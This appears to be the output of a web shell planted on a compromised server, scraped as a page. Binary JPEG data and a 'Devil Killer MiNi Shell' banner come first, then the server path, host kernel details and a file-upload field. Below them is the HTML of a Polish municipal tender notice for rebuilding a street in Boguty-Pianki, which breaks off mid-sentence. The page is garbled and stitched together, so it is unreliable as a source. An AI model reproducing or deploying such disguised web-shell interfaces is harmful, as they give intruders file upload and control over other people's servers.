JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220401/0010651101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa ulicy Targowej w miejscowości Boguty-Pianki </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BOGUTY-PIANKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 450670090</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Papieża Jana Pawła II 45</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Boguty-Pianki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">07-325</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL924 - Ostrołęcki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">862775003</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">862775003</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kontakt@boguty-pianki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://boguty-pianki.bipgmina.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa ulicy Targowej w miejscowości Boguty-Pianki </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a74c02ea-b127-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00106511</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00011199/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa ulicy Targowej w miejscowości Boguty-Pianki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://boguty-pianki.bipgmina.pl/wiadomosci/3/lista/przetargi <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja pomiędzy<br/>Zamawiającym a Wykonawcą w niniejszym postępowaniu odbywa się za pomocą miniPortalu<br/>dostępnego pod adresem https://miniportal.uzp.gov.pl/, ePUAPu dostępnego pod adresem<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: kontakt@boguty-pianki.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).<br/>2. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>Zamawiający zgodnie z §3 ust. 3 ww. Rozporządzenia, określa dopuszczalne formaty przesyłanych<br/>danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx,<br/>csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar,<br/>gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC,<br/>XMLenc, ze szczególnym wskazaniem na pdf. Więcej informacji w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">opisane w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">opisane w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GKW.271.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie ulicy Targowej w<br/>miejscowości Boguty-Pianki.<br/>2. Zakres rzeczowy zamówienia obejmuje:<br/>1) Roboty przygotowawcze,<br/>2) Jezdnia,<br/>3) Chodnik,<br/>4) Zjazdy,<br/>5) Stała organizacja ruchu,<br/>6) Kanał technologiczny.<br/>3. Szczegółowy opis przedmiotu zamówienia stanowi dokumentacja projektowa oraz<br/>specyfikacja techniczna wykonania i odbioru robót (załącznik nr 9 do SWZ).<br/>4. Inne postanowienia i wymagania Zamawiającego związane z realizacją przedmiotu<br/>zamówienia:<br/>1) Uregulowania odnoszące się do podwykonawców:<br/>Zamawiający dopuszcza możliwość powierzenia przez Wykonawcę wykonania części<br/>zamówienia podwykonawcom. W takim przypadku Wykonawca zobowiązany jest do wskazania<br/>w swojej ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom<br/>oraz podania nazw ewentualnych podwykonawców, jeżeli są już znani.<br/>Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby<br/>Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy, w celu wykazania<br/>spełniania warunków udziału w postępowaniu lub kryteriów selekcji, Wykonawca jest<br/>obowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub Wykonawca<br/>samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby<br/>Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.<br/>Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia Wykonawcy z<br/>odpowiedzialności za należyte wykonanie tego zamówienia.<br/>2) Personel Wykonawcy:<br/>Zgodnie z art. 95 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019) Zamawiający zobowiązuje Wykonawcę oraz Podwykonawcę do zatrudnienia<br/>na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia.<br/>Powyższy obowiązek dotyczy wszystkich osób (pracowników fizycznych), które będą świadczyły<br/>roboty budowlane związane z przebudową ulicy Targowej w miejscowości Boguty-Pianki.<br/>Projekt umowy, stanowiący załącznik nr 2 do SWZ, określa:<br/>1) rodzaj czynności związanych z realizacją zamówienia, których dotyczą wymagania<br/>zatrudnienia na podstawie stosunku pracy przez wykonawcę lub podwykonawcę osób<br/>wykonujących czynności w trakcie realizacji zamówienia,<br/>2) sposób weryfikacji zatrudnienia tych osób,<br/>3) uprawnienia zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań<br/>związanych z zatrudnianiem tych osób oraz sankcji z tytułu niespełnienia tych wymagań. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45100000-8 - Przygotowanie terenu pod budowę</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-03-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">: 1. Kryteria oceny ofert oraz ich znaczenie procentowe<br/>• Cena – waga 60%<br/>• Doświadczenie kierownika budowy – waga 10%<br/>• Gwarancja i rękojmia – waga 30%<br/>1) CENA – waga 60%<br/>Wartość punktowa ceny (wyliczona z zastosowaniem wzoru matematycznego)<br/>Cmin<br/>C = -------------------- x 60(Rc)<br/>Cbad<br/>gdzie:<br/>Rc – waga kryterium cena<br/>Cmin – cena najniższa z zaoferowanych ofert ważnych i niepodlegających odrzuceniu<br/>Cbad – cena oferty badanej<br/>C – liczba uzyskanych punktów w kryterium<br/>2) DOŚWIADCZENIE KIEROWNIKA BUDOWY – waga 10%<br/>Ocena w zakresie kryterium „doświadczenie kierownika budowy” będzie dokonywana na podstawie<br/>oświadczenia Wykonawcy podanego w formularzu ofertowym oraz dokumentu, który należy dołączyć<br/>wraz z ofertą – liczba punktów możliwych do uzyskania – 30.<br/>Jeżeli kierownik budowy, który zostanie skierowany do realizacji przedmiotu zamówienia, posiada<br/>uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności<br/>inżynieryjnej drogowej bez ograniczeń oraz posiada doświadczenie w pełnieniu funkcji kierownika<br/>budowy w zakresie:<br/>• dwóch robót budowlanych polegających na budowie, przebudowie, rozbudowie drogi publicznej o<br/>wartości robót 700 000 zł brutto każda – Zamawiający przyzna 0 pkt, • trzech robót budowlanych polegających na budowie, przebudowie, rozbudowie drogi publicznej o<br/>wartości robót 700 000 zł brutto każda – Zamawiający przyzna 5 pkt,<br/>• czterech robót budowlanych polegających na budowie, przebudowie, rozbudowie drogi publicznej o<br/>wartości robót 700 000 zł brutto każda – Zamawiający przyzna 10 pkt,<br/>Wykonawca zobowiązany jest złożyć wraz z ofertą stosowne dokumenty potwierdzające posiadanie<br/>doświadczenia, o którym mowa powyżej. Ze złożonych dokumentów musi bezpośrednio wynikać<br/>liczba, zakres oraz wartość robót, w ramach których wskazana osoba pełniła funkcję kierownika<br/>budowy – Zamawiający wymaga dołączenia np. kserokopii protokołów odbioru robót wraz z<br/>oświadczeniem osoby skierowanej do pełnienia funkcji kierownika budowy w przypadku, gdy protokół<br/>odbioru nie będzie zawierał wszystkich wymaganych informacji lub innych dokumentów, z których<br/>bezpośrednio będą wynikały informacje wymagane przez Zamawiającego. Jeżeli Wykonawca<br/>oświadczy powyższe w formularzu ofertowym ale nie dołączy dokumentu potwierdzającego –<br/>Zamawiający nie przyzna punktów w kryterium doświadczenie kierownika budowy. Zamawiający nie<br/>przyzna również punktów w kryterium doświadczenie kierownika budowy w przypadku, gdy wykonawca<br/>dołączy do oferty wyłącznie oświadczenie osoby skierowanej do pełnienia funkcji kierownika budowy w<br/>ww. zakresie.<br/>Wykonawca zobowiązany jest zapewnić, aby osoba, o której mowa w ww. kryterium pełniła funkcję<br/>kierownika budowy podczas realizacji przedmiotu zamówienia.<br/>3) GWARANCJA I RĘKOJMIA – waga 30%<br/>Jeżeli Wykonawca zobowiąże się do udzielenia gwarancji i rękojmi na wykonane roboty budowlane<br/>dłuższej niż wymagane minimum (tj. 36 miesięcy) otrzyma dodatkowe punkty:<br/>• Jeżeli Wykonawca zobowiąże się do udzielenia gwarancji i rękojmi na wykonane roboty budowlane<br/>na okres 48 miesięcy – otrzyma 15 punktów,<br/>• Jeżeli Wykonawca zobowiąże się do udzielenia gwarancji i rękojmi na wykonane roboty budowlane<br/>na okres 60 miesięcy – otrzyma 30 punktów.<br/>Wykonawca oświadczy powyższe w formularzu ofertowym.<br/>W przypadku, gdy Wykonawca nie zaznaczy okresu, na który zobowiązuje się udzielić gwarancji i<br/>rękojmi, Zamawiający uzna, że zobowiązuje się do udzielenia gwarancji i rękojmi na okres 36 miesięcy,<br/>tj. wymagane minimum i nie przyzna punktów w tym kryterium.<br/>2. Oferta, która otrzyma najwyższą liczbę punktów po zsumowaniu punktów za ww. kryteria zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu określone przez Zamawiającego w sposób proporcjonalny do przedmiotu<br/>zamówienia oraz umożliwiający ocenę zdolności wykonawcy do należytego wykonania<br/>zamówienia, w szczególności wyrażając je jako minimalne poziomy zdolności i dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>• Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca<br/>zobowiązany jest wykazać;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów<br/>• Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca<br/>zobowiązany jest wykazać;<br/>3) sytuacji ekonomicznej lub finansowej<br/>Wykonawca spełni warunek, jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej<br/>w zakresie prowadzonej działalności na kwotę, co najmniej 1 000.000,00 zł.<br/>4) zdolności technicznej lub zawodowej<br/>• w zakresie wiedzy i doświadczenia:<br/>Zamawiający wymaga, aby Wykonawca wykazał, że okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie wykonał co najmniej dwie roboty<br/>budowlane polegające na budowie, przebudowie, rozbudowie dróg publicznych o wartości nie<br/>mniejszej niż 500.000,00 zł brutto każda z robót wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz<br/>załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie,<br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez<br/>podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty.<br/>• w zakresie dysponowania osobami odpowiednimi do realizacji zamówienia:<br/>Zamawiający wymaga, aby Wykonawca wykazał, że dysponuje osobami niezbędnymi do<br/>realizacji przedmiotu zamówienia, tj. 1 osobą, która będzie pełniła funkcję kierownika budowy<br/>posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w<br/>specjalności inżynieryjnej drogowej bez ograniczeń, posiadająca co najmniej pięć lat<br/>doświadczenia zawodowego (licząc od daty uzyskania uprawnień budowlanych) na stanowisku<br/>kierownika budowy lub kierownika robót w rozumieniu prawa budowlanego, w tym przy realizacji co najmniej dwóch robót budowlanych na ww. stanowisku, polegających na budowie,<br/>przebudowie, rozbudowie dróg publicznych o wartości robót nie mniejszej niż 500.000,00 zł<br/>brutto każda.<br/>2. Wykonawca może, w celu potwierdzenia spełniania warunków udziału w postępowaniu<br/>polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego<br/>łączących go z nimi stosunków prawnych.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby,<br/>jeśli podmioty te wykonają roboty budowlane / usługi, do realizacji których te zdolności są<br/>wymagane.<br/>4. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>5. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. 4, potwierdza, że<br/>stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty<br/>dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane / usługi, których<br/>wskazane zdolności dotyczą.<br/>5. Wykonawca wraz z ofertą przedstawia oświadczenie, o którym mowa w Rozdziale IX ust. 1<br/>pkt 2 SWZ.<br/>6. Jeżeli zdolności techniczne lub zawodowe podmiotu, o którym mowa w ust. 3 nie potwierdzają<br/>spełnienia przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych<br/>podmiotów podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym<br/>przez Zamawiającego:<br/>7) zastąpił ten podmiot innym podmiotem lub podmiotami lub<br/>8) wykazał, że samodzielnie spełnia warunki udziału w postępowaniu, tj. zobowiązał się do<br/>osobistego wykonania odpowiedniej części, jeżeli wykaże samodzielnie zdolności techniczne lub<br/>zawodowe lub sytuację finansową lub ekonomiczną w zakresie, w którym polegał na<br/>zdolnościach innych podmiotów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu wykazania braku podstaw do wykluczenia Zamawiający wymaga złożenia:<br/>1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 ze zm.), z innym wykonawcą, który złożył odrębną ofertę,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do<br/>tej samej grupy kapitałowej (wzór oświadczenia stanowi załącznik nr 7 do SWZ);<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesiące 